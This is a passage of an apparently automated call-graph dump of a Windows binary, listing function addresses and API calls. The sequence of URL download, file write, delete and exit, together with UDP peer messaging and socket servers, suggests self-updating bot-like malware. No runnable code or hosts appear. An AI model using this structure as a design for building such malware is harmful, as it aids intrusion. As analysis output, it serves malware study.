40a9a7 __aligned_recalloc_base 5000->5007 5001->5007 5002 405d55 5002->4778 5002->4779 5003 40aaa0 __aligned_recalloc_base HeapValidate 5003->5007 5004 40aa50 HeapAlloc 5004->5007 5005 40aa1a HeapReAlloc 5005->5007 5006 40ab60 __aligned_recalloc_base 3 API calls 5006->5007 5007->5002 5007->5003 5007->5004 5007->5005 5007->5006 5011 40cb4b 5008->5011 5009 40a950 __aligned_recalloc_base 7 API calls 5009->5011 5010 405ded 5010->4779 5012 4076c0 5010->5012 5011->5009 5011->5010 5013 40a950 __aligned_recalloc_base 7 API calls 5012->5013 5014 4076d0 5013->5014 5015 407717 5014->5015 5016 4076dc memcpy CreateThread CloseHandle 5014->5016 5015->4779 5016->5015 5018 407720 GetTickCount srand rand Sleep 5016->5018 5017->5000 5019 407757 5018->5019 5020 4077ad 5018->5020 5021 4077ab 5019->5021 5024 407766 StrChrA 5019->5024 5020->5021 5022 40f560 63 API calls 5020->5022 5023 40ab60 __aligned_recalloc_base 3 API calls 5021->5023 5022->5021 5025 4077d8 5023->5025 5026 40777b 5024->5026 5029 40f560 9 API calls 5026->5029 5030 40f623 InternetOpenUrlW 5029->5030 5031 40f78e InternetCloseHandle Sleep 5029->5031 5032 40f781 InternetCloseHandle 5030->5032 5033 40f652 CreateFileW 5030->5033 5034 40f7b5 6 API calls 5031->5034 5035 407795 Sleep 5031->5035 5032->5031 5036 40f681 InternetReadFile 5033->5036 5037 40f774 CloseHandle 5033->5037 5034->5035 5038 40f831 wsprintfW DeleteFileW Sleep 5034->5038 5035->5019 5039 40f6d4 CloseHandle wsprintfW DeleteFileW Sleep 5036->5039 5040 40f6a5 5036->5040 5037->5032 5041 40f240 21 API calls 5038->5041 5058 40f240 CreateFileW 5039->5058 5040->5039 5042 40f6ae WriteFile 5040->5042 5044 40f871 5041->5044 5042->5036 5046 40f87b Sleep 5044->5046 5047 40f8af DeleteFileW 5044->5047 5050 40f400 6 API calls 5046->5050 5047->5035 5048 40f767 DeleteFileW 5048->5037 5049 40f72b Sleep 5051 40f400 6 API calls 5049->5051 5052 40f892 5050->5052 5053 40f742 5051->5053 5054 40f8ad 5052->5054 5056 40f8a5 ExitProcess 5052->5056 5055 40f75e 5053->5055 5057 40f756 ExitProcess 5053->5057 5054->5035 5055->5037 5059 40f285 CreateFileMappingW 5058->5059 5060 40f39a 5058->5060 5061 40f390 CloseHandle 5059->5061 5062 40f2a6 MapViewOfFile 5059->5062 5063 40f3a0 CreateFileW 5060->5063 5064 40f3f1 5060->5064 5061->5060 5065 40f2c5 GetFileSize 5062->5065 5066 40f386 CloseHandle 5062->5066 5067 40f3c2 WriteFile CloseHandle 5063->5067 5068 40f3e8 5063->5068 5064->5048 5064->5049 5069 40f2e1 5065->5069 5070 40f37c UnmapViewOfFile 5065->5070 5066->5061 5067->5068 5071 40ab60 __aligned_recalloc_base 3 API calls 5068->5071 5080 40d1a0 5069->5080 5070->5066 5071->5064 5074 40cb40 7 API calls 5075 40f330 5074->5075 5075->5070 5076 40f34d memcmp 5075->5076 5076->5070 5077 40f369 5076->5077 5078 40ab60 __aligned_recalloc_base 3 API calls 5077->5078 5079 40f372 5078->5079 5079->5070 5081 40cbd0 10 API calls 5080->5081 5082 40d1c4 5081->5082 5082->5070 5082->5074 5084 40e2ee 5083->5084 5085 40e1bd htons inet_addr setsockopt 5083->5085 5084->4556 5086 40b430 8 API calls 5085->5086 5087 40e236 bind lstrlenA sendto ioctlsocket 5086->5087 5091 40e28b 5087->5091 5088 40e2b2 5140 40b4f0 shutdown closesocket 5088->5140 5091->5088 5092 40a990 9 API calls 5091->5092 5131 40e310 5091->5131 5092->5091 5147 40e640 memset InternetCrackUrlA InternetOpenA 5093->5147 5096 40e51e 5096->4556 5099 40ab60 __aligned_recalloc_base 3 API calls 5099->5096 5100 40e4eb 5100->5099 5105 40e4e1 SysFreeString 5105->5100 5254 40b3f0 inet_addr 5108->5254 5111 40b4dd 5116 40eef0 5111->5116 5112 40b48c connect 5113 40b4a0 getsockname 5112->5113 5114 40b4d4 5112->5114 5113->5114 5257 40b4f0 shutdown closesocket 5114->5257 5258 40b3d0 inet_ntoa 5116->5258 5118 40ef06 5119 40d470 11 API calls 5118->5119 5120 40ef25 5119->5120 5121 40e14c 5120->5121 5259 40ef70 memset InternetCrackUrlA InternetOpenA 5120->5259 5121->4562 5124 40ef5c 5126 40ab60 __aligned_recalloc_base 3 API calls 5124->5126 5125 40ab60 __aligned_recalloc_base 3 API calls 5125->5124 5126->5121 5129 40ac84 5127->5129 5128 40ac8a 5128->4552 5129->5128 5130 40ab60 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5129->5130 5130->5129 5136 40e32c 5131->5136 5132 40e3f4 5132->5091 5133 40e348 recvfrom 5134 40e376 StrCmpNIA 5133->5134 5135 40e369 Sleep 5133->5135 5134->5136 5137 40e395 StrStrIA 5134->5137 5135->5136 5136->5132 5136->5133 5137->5136 5138 40e3b6 StrChrA 5137->5138 5141 40d320 5138->5141 5140->5084 5142 40d32b 5141->5142 5143 40d331 lstrlenA 5142->5143 5144 40d344 5142->5144 5145 40a950 __aligned_recalloc_base 7 API calls 5142->5145 5146 40d360 memcpy 5142->5146 5143->5142 5143->5144 5144->5136 5145->5142 5146->5142 5146->5144 5148 40e6e1 InternetConnectA 5147->5148 5149 40e41a 5147->5149 5150 40e84a InternetCloseHandle 5148->5150 5151 40e71a HttpOpenRequestA 5148->5151 5149->5096 5160 40e530 5149->5160 5150->5149 5152 40e750 HttpSendRequestA 5151->5152 5153 40e83d InternetCloseHandle 5151->5153 5154 40e830 InternetCloseHandle 5152->5154 5156 40e76d 5152->5156 5153->5150 5154->5153 5155 40e78e InternetReadFile 5155->5156 5157 40e7bb 5155->5157 5156->5155 5156->5157 5158 40a990 9 API calls 5156->5158 5157->5154 5159 40e7d6 memcpy 5158->5159 5159->5156 5189 40d250 5160->5189 5163 40e433 5163->5100 5170 40eea0 5163->5170 5164 40e55a SysAllocString 5165 40e571 CoCreateInstance 5164->5165 5166 40e627 5164->5166 5167 40e61d SysFreeString 5165->5167 5169 40e596 5165->5169 5168 40ab60 __aligned_recalloc_base 3 API calls 5166->5168 5167->5166 5168->5163 5169->5167 5206 40e9f0 5170->5206 5173 40e870 5211 40ecc0 5173->5211 5178 40ee20 6 API calls 5179 40e8c7 5178->5179 5185 40e4b2 5179->5185 5228 40eae0 5179->5228 5182 40e8ff 5182->5185 5233 40e990 5182->5233 5183 40eae0 6 API calls 5183->5182 5185->5105 5186 40d470 5185->5186 5249 40d3e0 5186->5249 5193 40d25d 5189->5193 5190 40d263 lstrlenA 5191 40d276 5190->5191 5190->5193 5191->5163 5191->5164 5193->5190 5193->5191 5194 40a950 __aligned_recalloc_base 7 API calls 5193->5194 5196 40ab60 __aligned_recalloc_base 3 API calls 5193->5196 5197 405740 5193->5197 5201 4056f0 5193->5201 5194->5193 5196->5193 5198 405757 MultiByteToWideChar 5197->5198 5199 40574a lstrlenA 5197->5199 5200 40577c 5198->5200 5199->5198 5200->5193 5202 4056fb 5201->5202 5203 405701 lstrlenA 5202->5203 5204 405740 2 API calls 5202->5204 5205 405737 5202->5205 5203->5202 5204->5202 5205->5193 5207 40ea16 5206->5207 5208 40e49d 5207->5208 5209 40ea93 lstrcmpiW 5207->5209 5210 40eaab SysFreeString 5207->5210 5208->5100 5208->5173 5209->5207 5209->5210 5210->5207 5213 40ece6 5211->5213 5212 40e88b 5212->5185 5223 40ee20 5212->5223 5213->5212 5214 40ed73 lstrcmpiW 5213->5214 5215 40edf3 SysFreeString 5214->5215 5216 40ed86 5214->5216 5215->5212 5217 40e990 2 API calls 5216->5217 5219 40ed94 5217->5219 5218 40ede5 5218->5215 5219->5215 5219->5218 5220 40edc3 lstrcmpiW 5219->5220 5221 40edd5 5220->5221 5222 40eddb SysFreeString 5220->5222 5221->5222 5222->5218 5224 40e990 2 API calls 5223->5224 5225 40ee3b 5224->5225 5226 40ecc0 6 API calls 5225->5226 5227 40e8a9 5225->5227 5226->5227 5227->5178 5227->5185 5229 40e990 2 API calls 5228->5229 5231 40eafb 5229->5231 5230 40e8e5 5230->5182 5230->5183 5231->5230 5237 40eb60 5231->5237 5234 40e9b6 5233->5234 5235 40e9cd 5234->5235 5236 40e9f0 2 API calls 5234->5236 5235->5185 5236->5235 5239 40eb86 5237->5239 5238 40ec9d 5238->5230 5239->5238 5240 40ec13 lstrcmpiW 5239->5240 5241 40ec93 SysFreeString 5240->5241 5242 40ec26 5240->5242 5241->5238 5243 40e990 2 API calls 5242->5243 5245 40ec34 5243->5245 5244 40ec85 5244->5241 5245->5241 5245->5244 5246 40ec63 lstrcmpiW 5245->5246 5247 40ec75 5246->5247 5248 40ec7b SysFreeString 5246->5248 5247->5248 5248->5244 5253 40d3ed 5249->5253 5250 40d408 SysFreeString 5250->5105 5251 40a990 9 API calls 5251->5253 5252 40d390 _vscprintf wvsprintfA 5252->5253 5253->5250 5253->5251 5253->5252 5255 40b41c socket 5254->5255 5256 40b409 gethostbyname 5254->5256 5255->5111 5255->5112 5256->5255 5257->5111 5258->5118 5260 40ef47 5259->5260 5261 40f014 InternetConnectA 5259->5261 5260->5124 5260->5125 5262 40f194 InternetCloseHandle 5261->5262 5263 40f04d HttpOpenRequestA 5261->5263 5262->5260 5264 40f083 HttpAddRequestHeadersA HttpSendRequestA 5263->5264 5265 40f187 InternetCloseHandle 5263->5265 5266 40f17a InternetCloseHandle 5264->5266 5267 40f0cd 5264->5267 5265->5262 5266->5265 5268 40f0e4 InternetReadFile 5267->5268 5269 40f111 5267->5269 5270 40a990 9 API calls 5267->5270 5268->5267 5268->5269 5269->5266 5271 40f12c memcpy 5270->5271 5271->5267 5280 407417 5272->5280 5273 4075eb 5274 4075f4 SysFreeString 5273->5274 5275 4073bb SysFreeString 5273->5275 5274->5275 5275->4565 5276 40ab60 __aligned_recalloc_base 3 API calls 5276->5273 5277 407670 CoCreateInstance 5277->5280 5278 407566 SysAllocString 5279 407432 5278->5279 5278->5280 5279->5273 5279->5276 5280->5277 5280->5278 5280->5279 5282 40c87a 5281->5282 5283 40c87e 5281->5283 5282->4571 5285 40c830 CryptAcquireContextW 5283->5285 5286 40c86b 5285->5286 5287 40c84d CryptGenRandom CryptReleaseContext 5285->5287 5286->5282 5287->5286 5288->4589 5340 40b780 gethostname 5289->5340 5292 40b869 5292->4589 5294 40b87c strcmp 5294->5292 5295 40b891 5294->5295 5344 40b3d0 inet_ntoa 5295->5344 5297 40b89f strstr 5298 40b8f0 5297->5298 5299 40b8af 5297->5299 5345 40b3d0 inet_ntoa 5298->5345 5357 40b3d0 inet_ntoa 5299->5357 5302 40b8bd strstr 5302->5292 5304 40b8cd 5302->5304 5303 40b8fe strstr 5305 40b90e 5303->5305 5306 40b94f 5303->5306 5358 40b3d0 inet_ntoa 5304->5358 5359 40b3d0 inet_ntoa 5305->5359 5346 40b3d0 inet_ntoa 5306->5346 5310 40b95d strstr 5313 40b96d 5310->5313 5314 40b9ae EnterCriticalSection 5310->5314 5311 40b8db strstr 5311->5292 5311->5298 5312 40b91c strstr 5312->5292 5315 40b92c 5312->5315 5361 40b3d0 inet_ntoa 5313->5361 5317 40b9c6 5314->5317 5360 40b3d0 inet_ntoa 5315->5360 5325 40b9f1 5317->5325 5363 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5317->5363 5319 40b97b strstr 5319->5292 5321 40b98b 5319->5321 5320 40b93a strstr 5320->5292 5320->5306 5362 40b3d0 inet_ntoa 5321->5362 5324 40baea LeaveCriticalSection 5324->5292 5325->5324 5327 40a740 7 API calls 5325->5327 5326 40b999 strstr 5326->5292 5326->5314 5328 40ba35 5327->5328 5328->5324 5347 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5328->5347 5330 40ba53 5331 40ba80 5330->5331 5332 40ba76 Sleep 5330->5332 5334 40baa5 5330->5334 5333 40ab60 __aligned_recalloc_base 3 API calls 5331->5333 5332->5330 5333->5334 5334->5324 5348 40b530 5334->5348 5337 40b530 14 API calls 5336->5337 5338 40b523 LeaveCriticalSection 5337->5338 5338->4594 5339->4599 5341 40b7a7 gethostbyname 5340->5341 5342 40b7c3 5340->5342 5341->5342 5342->5292 5343 40b3d0 inet_ntoa 5342->5343 5343->5294 5344->5297 5345->5303 5346->5310 5347->5330 5349 40b544 5348->5349 5356 40b53f 5348->5356 5350 40a950 __aligned_recalloc_base 7 API calls 5349->5350 5352 40b558 5350->5352 5351 40b5b4 CreateFileW 5353 40b603 InterlockedExchange 5351->5353 5354 40b5d7 WriteFile FlushFileBuffers CloseHandle 5351->5354 5352->5351 5352->5356 5355 40ab60 __aligned_recalloc_base 3 API calls 5353->5355 5354->5353 5355->5356 5356->5324 5357->5302 5358->5311 5359->5312 5360->5320 5361->5319 5362->5326 5363->5325 5367 40dcdd 5364->5367 5365 40dc13 5365->4606 5365->4607 5366 40dd01 WaitForSingleObject 5366->5367 5368 40dd1c CloseHandle 5366->5368 5367->5365 5367->5366 5368->5367 5370 40bdd3 WaitForSingleObject 5369->5370 5371 40be01 5370->5371 5372 40bdeb InterlockedDecrement 5370->5372 5373 40bdfa 5372->5373 5373->5370 5374 40b510 16 API calls 5373->5374 5374->5373 5436 4013b0 5375->5436 5377 40dfdd 5378 40e060 5377->5378 5380 40dff7 InterlockedExchangeAdd 5377->5380 5381 40e03b WaitForSingleObject 5377->5381 5449 40bbb0 EnterCriticalSection 5377->5449 5454 40bed0 5377->5454 5380->5377 5380->5381 5381->5377 5382 40e054 5381->5382 5457 401330 5382->5457 5387 401f92 5386->5387 5388 402008 5386->5388 5389 401f97 WSAGetOverlappedResult 5387->5389 5536 401d60 5387->5536 5389->5387 5390 401fb9 WSAGetLastError 5389->5390 5390->5387 5392 401fd3 GetQueuedCompletionStatus 5392->5387 5392->5388 5577 401470 5393->5577 5395 40e084 5396 40e0b2 5395->5396 5397 40e095 WaitForSingleObject 5395->5397 5398 401330 8 API calls 5397->5398 5399 40e0af 5398->5399 5399->5396 5592 4021b0 5400->5592 5403 40d9c2 5404 40d9a5 WaitForSingleObject 5596 401600 5404->5596 5408 401ac9 5407->5408 5409 40194d WSAWaitForMultipleEvents 5407->5409 5410 4019f0 GetTickCount 5409->5410 5411 40196a WSAEnumNetworkEvents 5409->5411 5412 401a43 GetTickCount 5410->5412 5413 401a05 EnterCriticalSection 5410->5413 5411->5410 5426 401983 5411->5426 5416 401ab5 WaitForSingleObject 5412->5416 5417 401a4e EnterCriticalSection 5412->5417 5414 401a16 5413->5414 5415 401a3a LeaveCriticalSection 5413->5415 5421 401a29 LeaveCriticalSection 5414->5421 5660 401820 5414->5660 5415->5416 5416->5408 5416->5409 5419 401aa1 LeaveCriticalSection GetTickCount 5417->5419 5420 401a5f InterlockedExchangeAdd 5417->5420 5418 401992 accept 5418->5410 5418->5426 5419->5416 5678 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5420->5678 5421->5416 5425 401a72 5425->5419 5425->5420 5679 40b4f0 shutdown closesocket 5425->5679 5426->5410 5426->5418 5428 4019e9 5426->5428 5640 4022c0 5426->5640 5429 401cf0 7 API calls 5428->5429 5429->5410 5435 40d934 5430->5435 5431 40bbb0 5 API calls 5431->5435 5432 40d950 WaitForSingleObject 5434 40d975 5432->5434 5432->5435 5435->5431 5435->5432 5435->5434 5693 40d550 InterlockedExchangeAdd 5435->5693 5437 40a740 7 API calls 5436->5437 5438 4013bb CreateEventA socket 5437->5438 5439 4013f2 5438->5439 5440 4013fd 5438->5440 5441 401330 8 API calls 5439->5441 5442 401401 bind 5440->5442 5443 401462 5440->5443 5444 4013f8 5441->5444 5445 401444 CreateThread 5442->5445 5446 401434 5442->5446 5443->5377 5444->5440 5445->5443 5467 401100 5445->5467 5447 401330 8 API calls 5446->5447 5448 40143a 5447->5448 5448->5377 5450 40bbe7 LeaveCriticalSection 5449->5450 5451 40bbcf 5449->5451 5450->5377 5452 40c870 3 API calls 5451->5452 5453 40bbda 5452->5453 5453->5450 5496 40be30 5454->5496 5458 401339 5457->5458 5465 40139b 5457->5465 5459 401341 SetEvent WaitForSingleObject CloseHandle 5458->5459 5458->5465 5460 401369 5459->5460 5466 40138b 5459->5466 5463 40ab60 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5460->5463 5460->5466 5462 401395 5464 40ab60 __aligned_recalloc_base 3 API calls 5462->5464 5463->5460 5464->5465 5465->5378 5535 40b4f0 shutdown closesocket 5466->5535 5468 401115 ioctlsocket 5467->5468 5469 4011e4 5468->5469 5474 40113a 5468->5474 5470 40ab60 __aligned_recalloc_base 3 API calls 5469->5470 5472 4011ea 5470->5472 5471 4011cd WaitForSingleObject 5471->5468 5471->5469 5473 40a990 9 API calls 5473->5474 5474->5471 5474->5473 5475 401168 recvfrom 5474->5475 5476 4011ad InterlockedExchangeAdd 5474->5476 5475->5471 5475->5474 5478 401000 5476->5478 5479 401014 5478->5479 5480 40103b 5479->5480 5481 40a740 7 API calls 5479->5481 5489 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5480->5489 5481->5480 5483 40105b 5490 401580 5483->5490 5485 4010ec 5485->5474 5486 4010a3 IsBadReadPtr 5487 401071 5486->5487 5487->5485 5487->5486 5488 4010d8 memmove 5487->5488 5488->5487 5489->5483 5491 401592 5490->5491 5492 4015a5 memcpy 5490->5492 5494 40a990 9 API calls 5491->5494 5493 4015c1 5492->5493 5493->5487 5495 40159f 5494->5495 5495->5492 5497 40c8b0 3 API calls 5496->5497 5498 40be3b 5497->5498 5499 40be57 lstrlenA 5498->5499 5500 40cb40 7 API calls 5499->5500 5501 40be8d 5500->5501 5502 40beb8 5501->5502 5507 40dfa0 5501->5507 5510 40d6b0 5501->5510 5502->5377 5503 40beac 5504 40ab60 __aligned_recalloc_base 3 API calls 5503->5504 5504->5502 5515 401200 5507->5515 5509 40dfc2 5509->5503 5531 40d710 5510->5531 5513 40d6de 5513->5503 5514 40d710 send 5514->5513 5516 40121d 5515->5516 5529 401314 5515->5529 5517 40a950 __aligned_recalloc_base 7 API calls 5516->5517 5516->5529 5518 401247 memcpy htons 5517->5518 5519 4012ed 5518->5519 5520 401297 sendto 5518->5520 5521 40ab60 __aligned_recalloc_base 3 API calls 5519->5521 5522 4012b6 InterlockedExchangeAdd 5520->5522 5523 4012e9 5520->5523 5525 4012fc 5521->5525 5522->5520 5526 4012cc 5522->5526 5523->5519 5524 40130a 5523->5524 5527 40ab60 __aligned_recalloc_base 3 API calls 5524->5527 5525->5509 5528 40ab60 __aligned_recalloc_base 3 API calls 5526->5528 5527->5529 5530 4012db 5528->5530 5529->5509 5530->5509 5532 40d721 send 5531->5532 5533 40d6c3 5532->5533 5534 40d73e 5532->5534 5533->5513 5533->5514 5534->5532 5534->5533 5535->5462 5537 401ef2 InterlockedDecrement setsockopt closesocket 5536->5537 5538 401d74 5536->5538 5540 401e39 5537->5540 5538->5537 5539 401d7c 5538->5539 5556 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5539->5556 5540->5392 5542 401d81 InterlockedExchange 5543 401d98 5542->5543 5544 401e4e 5542->5544 5543->5540 5549 401da9 InterlockedDecrement 5543->5549 5550 401dbc InterlockedDecrement InterlockedExchangeAdd 5543->5550 5545 401e67 5544->5545 5546 401e57 InterlockedDecrement 5544->5546 5547 401e72 5545->5547 5548 401e87 InterlockedDecrement 5545->5548 5546->5392 5565 401ae0 WSASend 5547->5565 5552 401ee9 5548->5552 5549->5392 5553 401e2f 5550->5553 5552->5392 5557 401cf0 5553->5557 5554 401e7e 5554->5392 5556->5542 5558 401d00 InterlockedExchangeAdd 5557->5558 5559 401cfc 5557->5559 5560 401d53 5558->5560 5561 401d17 InterlockedIncrement 5558->5561 5559->5540 5560->5540 5571 401c50 WSARecv 5561->5571 5563 401d46 5563->5560 5564 401d4c InterlockedDecrement 5563->5564 5564->5560 5566 401b50 5565->5566 5567 401b12 WSAGetLastError 5565->5567 5566->5554 5567->5566 5568 401b1f 5567->5568 5569 401b56 5568->5569 5570 401b26 Sleep WSASend 5568->5570 5569->5554 5570->5566 5570->5567 5572 401cd2 5571->5572 5573 401c8e 5571->5573 5572->5563 5574 401c90 WSAGetLastError 5573->5574 5575 401ca4 Sleep WSARecv 5573->5575 5576 401cdb 5573->5576 5574->5572 5574->5573 5575->5572 5575->5574 5576->5563 5578 401483 5577->5578 5579 401572 5577->5579 5578->5579 5580 40a740 7 API calls 5578->5580 5579->5395 5581 401498 CreateEventA socket 5580->5581 5582 4014da 5581->5582 5583 4014cf 5581->5583 5582->5579 5584 4014e2 htons setsockopt bind 5582->5584 5585 401330 8 API calls 5583->5585 5586 401546 5584->5586 5587 401558 CreateThread 5584->5587 5588 4014d5 5585->5588 5589 401330 8 API calls 5586->5589 5587->5579 5591 401100 20 API calls __aligned_recalloc_base 5587->5591 5588->5582 5590 40154c 5589->5590 5590->5395 5593 4021cf 5592->5593 5594 4021bb 5592->5594 5593->5403 5593->5404 5594->5593 5617 402020 5594->5617 5597 401737 5596->5597 5598 40160d 5596->5598 5597->5403 5598->5597 5599 401619 EnterCriticalSection 5598->5599 5600 401630 5599->5600 5601 4016b5 LeaveCriticalSection SetEvent 5599->5601 5600->5601 5606 401641 InterlockedDecrement 5600->5606 5607 40165a InterlockedExchangeAdd 5600->5607 5614 4016a0 InterlockedDecrement 5600->5614 5602 4016d0 5601->5602 5603 4016e8 5601->5603 5604 4016d6 PostQueuedCompletionStatus 5602->5604 5605 40dd50 11 API calls 5603->5605 5604->5603 5604->5604 5608 4016f3 5605->5608 5606->5600 5607->5600 5609 40166d InterlockedIncrement 5607->5609 5610 40de90 7 API calls 5608->5610 5611 401c50 4 API calls 5609->5611 5612 4016fc CloseHandle CloseHandle WSACloseEvent 5610->5612 5611->5600 5639 40b4f0 shutdown closesocket 5612->5639 5614->5600 5615 401724 DeleteCriticalSection 5616 40ab60 __aligned_recalloc_base 3 API calls 5615->5616 5616->5597 5618 40a740 7 API calls 5617->5618 5619 40202b 5618->5619 5620 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5619->5620 5621 4021aa 5619->5621 5622 402076 CreateIoCompletionPort 5620->5622 5623 40219f 5620->5623 5621->5593 5622->5623 5624 40208f 5622->5624 5625 401600 36 API calls 5623->5625 5626 40dbb0 8 API calls 5624->5626 5627 4021a5 5625->5627 5628 402094 5626->5628 5627->5621 5628->5623 5629 40209f WSASocketA 5628->5629 5629->5623 5630 4020bd setsockopt htons bind 5629->5630 5630->5623 5631 402126 listen 5630->5631 5631->5623 5632 40213a WSACreateEvent 5631->5632 5632->5623 5633 402147 WSAEventSelect 5632->5633 5633->5623 5634 402159 5633->5634 5635 40217f 5634->5635 5637 40dbe0 330 API calls 5634->5637 5636 40dbe0 330 API calls 5635->5636 5638 402194 5636->5638 5637->5634 5638->5593 5639->5615 5641 4022d2 EnterCriticalSection 5640->5641 5642 4022cd 5640->5642 5643 4022e7 5641->5643 5644 4022fd LeaveCriticalSection 5641->5644 5642->5426 5643->5644 5645 402308 5644->5645 5646 40230f 5644->5646 5645->5426 5647 40a740 7 API calls 5646->5647 5648 402319 5647->5648 5649 402326 getpeername CreateIoCompletionPort 5648->5649 5650 4023b8 5648->5650 5651 4023b2 5649->5651 5652 402366 5649->5652 5682 40b4f0 shutdown closesocket 5650->5682 5655 40ab60 __aligned_recalloc_base 3 API calls 5651->5655 5680 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5652->5680 5655->5650 5656 4023c3 5656->5426 5657 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5681 4021e0 EnterCriticalSection LeaveCriticalSection 5657->5681 5659 4023ab 5659->5426 5661 40190f 5660->5661 5662 401830 5660->5662 5661->5415 5662->5661 5663 40183d InterlockedExchangeAdd 5662->5663 5663->5661 5669 401854 5663->5669 5664 401880 5665 401891 5664->5665 5692 40b4f0 shutdown closesocket 5664->5692 5667 4018a7 InterlockedDecrement 5665->5667 5670 401901 5665->5670 5667->5670 5669->5661 5669->5664 5683 4017a0 EnterCriticalSection 5669->5683 5671 402247 5670->5671 5672 402265 EnterCriticalSection 5670->5672 5671->5415 5673 40229c LeaveCriticalSection DeleteCriticalSection 5672->5673 5676 40227d 5672->5676 5674 40ab60 __aligned_recalloc_base 3 API calls 5673->5674 5674->5671 5675 40ab60 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5675->5676 5676->5675 5677 40229b 5676->5677 5677->5673 5678->5425 5679->5425 5680->5657 5681->5659 5682->5656 5684 401807 LeaveCriticalSection 5683->5684 5685 4017ba InterlockedExchangeAdd 5683->5685 5684->5669 5686 4017ca LeaveCriticalSection 5685->5686 5687 4017d9 5685->5687 5686->5669 5688 40ab60 __aligned_recalloc_base 3 API calls 5687->5688 5689 4017fe 5688->5689 5690 40ab60 __aligned_recalloc_base 3 API calls 5689->5690 5691 401804 5690->5691 5691->5684 5692->5665 5694 40d56d 5693->5694 5704 40d566 5693->5704 5710 40d840 5694->5710 5697 40d58d InterlockedIncrement 5707 40d597 5697->5707 5698 40bed0 18 API calls 5698->5707 5699 40d5c0 5732 40b3d0 inet_ntoa 5699->5732 5701 40d5cc 5702 40d690 InterlockedDecrement 5701->5702 5731 40b4f0 shutdown closesocket 5702->5731 5704->5435 5705 40a950 __aligned_recalloc_base 7 API calls 5705->5707 5706 40d770 6 API calls 5706->5707 5707->5698 5707->5699 5707->5702 5707->5705 5707->5706 5708 40ab60 __aligned_recalloc_base 3 API calls 5707->5708 5717 40bf20 5707->5717 5708->5707 5711 40d84d socket 5710->5711 5712 40d862 htons connect 5711->5712 5713 40d8bf 5711->5713 5712->5713 5715 40d8aa 5712->5715 5713->5711 5714 40d57d 5713->5714 5714->5697 5714->5704 5733 40b4f0 shutdown closesocket 5715->5733 5728 40bf31 5717->5728 5719 40bf4f 5721 40ab60 __aligned_recalloc_base 3 API calls 5719->5721 5722 40c2ff 5721->5722 5722->5707 5723 40c310 26 API calls 5723->5728 5724 40b830 32 API calls 5724->5728 5727 40bed0 18 API calls 5727->5728 5728->5719 5728->5723 5728->5724 5728->5727 5734 40c460 5728->5734 5741 40bc00 EnterCriticalSection 5728->5741 5746 4072e0 5728->5746 5751 407210 5728->5751 5754 407240 5728->5754 5759 407110 5728->5759 5731->5704 5732->5701 5733->5714 5735 40c471 lstrlenA 5734->5735 5736 40cb40 7 API calls 5735->5736 5737 40c48f 5736->5737 5737->5735 5739 40c49b 5737->5739 5738 40ab60 __aligned_recalloc_base 3 API calls 5740 40c51f 5738->5740 5739->5738 5739->5740 5740->5728 5742 40bc18 5741->5742 5743 40bc54 LeaveCriticalSection 5742->5743 5766 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5742->5766 5743->5728 5745 40bc43 5745->5743 5767 407280 5746->5767 5749 40732c 5749->5728 5785 4060a0 EnterCriticalSection 5751->5785 5753 407232 5753->5728 5755 407280 75 API calls 5754->5755 5756 407254 5755->5756 5757 407279 5756->5757 5758 40dbe0 341 API calls 5756->5758 5757->5728 5758->5757 5822 405fe0 EnterCriticalSection 5759->5822 5761 40712a 5765 40715d 5761->5765 5827 407170 5761->5827 5764 40ab60 __aligned_recalloc_base 3 API calls 5764->5765 5765->5728 5766->5745 5770 407293 5767->5770 5768 4072d0 5768->5749 5771 407340 5768->5771 5770->5768 5774 405ef0 EnterCriticalSection 5770->5774 5772 40be30 18 API calls 5771->5772 5773 407385 5772->5773 5773->5749 5775 40d1d0 71 API calls 5774->5775 5776 405f0e 5775->5776 5777 405fcb LeaveCriticalSection 5776->5777 5778 405f27 5776->5778 5781 405f48 5776->5781 5777->5770 5779 405f31 memcpy 5778->5779 5780 405f46 5778->5780 5779->5780 5782 40ab60 __aligned_recalloc_base 3 API calls 5780->5782 5781->5780 5784 405fa6 memcpy 5781->5784 5783 405fc8 5782->5783 5783->5777 5784->5780 5810 40d230 5785->5810 5788 4062e3 LeaveCriticalSection 5788->5753 5789 40d1d0 71 API calls 5790 4060d9 5789->5790 5790->5788 5791 406134 memcpy 5790->5791 5809 4061f8 5790->5809 5794 40ab60 __aligned_recalloc_base 3 API calls 5791->5794 5792 405d30 76 API calls 5797 406221 5792->5797 5793 40ab60 __aligned_recalloc_base 3 API calls 5795 406242 5793->5795 5796 406158 5794->5796 5795->5788 5798 406251 CreateFileW 5795->5798 5799 40abd0 8 API calls 5796->5799 5797->5793 5798->5788 5800 406274 5798->5800 5801 406168 5799->5801 5804 406291 WriteFile 5800->5804 5805 4062cf FlushFileBuffers CloseHandle 5800->5805 5802 40ab60 __aligned_recalloc_base 3 API calls 5801->5802 5803 40618f 5802->5803 5806 40cb40 7 API calls 5803->5806 5804->5800 5805->5788 5807 4061c5 5806->5807 5808 4076c0 72 API calls 5807->5808 5808->5809 5809->5792 5809->5797 5813 40c780 5810->5813 5818 40c791 5813->5818 5814 40abd0 8 API calls 5814->5818 5815 40c6e0 70 API calls 5815->5818 5816 40ab60 __aligned_recalloc_base 3 API calls 5817 4060c2 5816->5817 5817->5788 5817->5789 5818->5814 5818->5815 5819 4084a0 68 API calls 5818->5819 5820 40c7ab 5818->5820 5821 40c7eb memcmp 5818->5821 5819->5818 5820->5816 5821->5818 5821->5820 5824 405ffe 5822->5824 5823 40608a LeaveCriticalSection 5823->5761 5824->5823 5825 40abd0 8 API calls 5824->5825 5826 40605c 5825->5826 5826->5823 5828 40a950 __aligned_recalloc_base 7 API calls 5827->5828 5829 407182 memcpy 5828->5829 5830 40be30 18 API calls 5829->5830 5831 4071ec 5830->5831 5832 40ab60 __aligned_recalloc_base 3 API calls 5831->5832 5833 407151 5832->5833 5833->5764 5839 407840 5834->5839 5835 407868 Sleep 5835->5839 